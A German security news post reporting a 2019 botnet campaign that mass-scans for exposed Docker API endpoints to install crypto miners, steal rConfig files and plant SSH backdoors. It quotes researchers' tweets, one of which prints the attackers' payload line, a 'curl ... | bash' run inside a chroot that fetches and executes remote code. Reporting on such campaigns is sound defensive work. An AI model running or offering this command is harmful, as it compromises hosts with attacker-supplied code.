Vorsicht: Massen-Scan auf offene Docker API-Endpunkte

Sicherheitsforscher sind auf einen Massenscan aufmerksam geworden, mit dem Cyber-Kriminelle das Internet nach offenen Docker API-Endpunkten scannen. Das Ziel ist aktuell Krypto-Miner auf diesen Docker-Instanzen zu installieren.

Betreibt ihr Docker-Instanzen, deren API-Endpunkte im Internet erreichbar sind? Dann solltet ihr handeln und diese API-Endpunkte absichern.

A hacking group is mass-scanning the internet for Docker systems with exposed API endpoints to mine cryptocurrency

– they've already made 14.82 XMR ($740) in 2 days
– they're also stealing rConfig config files
– they're also leaving SSH backdoors behindhttps://t.co/rxedcanLwr pic.twitter.com/UyDjXrYeXZ

— Catalin Cimpanu (@campuscodi) November 26, 2019

Obiger Tweet von Catalin Cimpanu weist auf einen Massenscan auf offene Docker API-Endpunkte im Internet hin. Troy Mursch, Chief Research Officer und Mitbegründer von Bad Packets LLC, hat das Ganze aufgedeckt.

Opportunistic mass scanning activity detected targeting exposed Docker API endpoints.

These scans create a container using an Alpine Linux image, and execute the payload via:
"Command": "chroot /mnt /bin/sh -c 'curl -sL4 https://t.co/q047bRPUyj | bash;'",#threatintel pic.twitter.com/vxszV5SF1o

— Bad Packets Report (@bad_packets) November 25, 2019

"Benutzer der Bad Packets CTI API werden feststellen, dass Exploit-Aktivitäten, die auf exponierte Docker-Instanzen abzielen, nichts Neues sind und recht häufig vorkommen", sagte Troy Mursch gegenüber ZDNet. "Was diese Kampagne auszeichnet, war der große Anstieg der Scan-Aktivität. Das allein rechtfertigte weitere Untersuchungen, um herauszufinden, was dieses Botnetz vorhatte."

Noch ist das Verhalten nicht vollständig analysiert. Aber es sind wohl nicht die üblichen Script-Kiddies, sondern Leute, die wissen, was sie wollen. Offenbar sind die Hintermänner erfolgreich, konnten sie binnen 2 Tagen 740 US-Dollar Kryptogeld schürfen. Das Problem: Auf infizierten Docker-Instanzen werden die rConfig-Dateien abgezogen und es bleibt eine SSH-Backdoor zurück. Über die Backdoor könnte bald anderes Unbill drohen. Details finden sich im verlinkten ZDNet-Beitrag.